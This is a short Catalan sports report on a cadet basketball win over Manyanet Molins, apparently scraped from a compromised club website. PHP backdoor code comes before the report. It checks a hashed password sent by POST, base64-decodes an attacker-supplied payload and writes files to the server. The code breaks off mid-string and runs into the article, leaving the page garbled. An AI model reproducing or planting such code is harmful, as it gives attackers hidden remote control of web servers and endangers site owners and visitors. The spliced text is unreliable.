function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 04 A sobreviu a la defensa en zona del Manyanet Molins (68-66) - Tgn Bàsquet Club -

El cadet masculí 04 A sobreviu a la defensa en zona del Manyanet Molins (68-66)

Updated: gener 29, 2019

El cadet masculí 04 A va aconseguir una victòria molt valuosa contra el Manyanet Molins. L’equip que entrena Raül Bonet va sortir prou bé en defensa però no va tenir encert en atac i això va fer que anés a remolc els primers minuts. Amb tot, el conjunt lila va continuar defensant bé i això el va permetre sortir al contraatac (32-31 al descans). A la represa la millora dels locals va seguir però en l’últim període el Manyanet va plantar una defensa en zona que va complicar les coses als locals. Les diferències s’escurçaven perillosament però afortunadament pels interessos del TGN Bàsquet la victòria es va quedar a casa.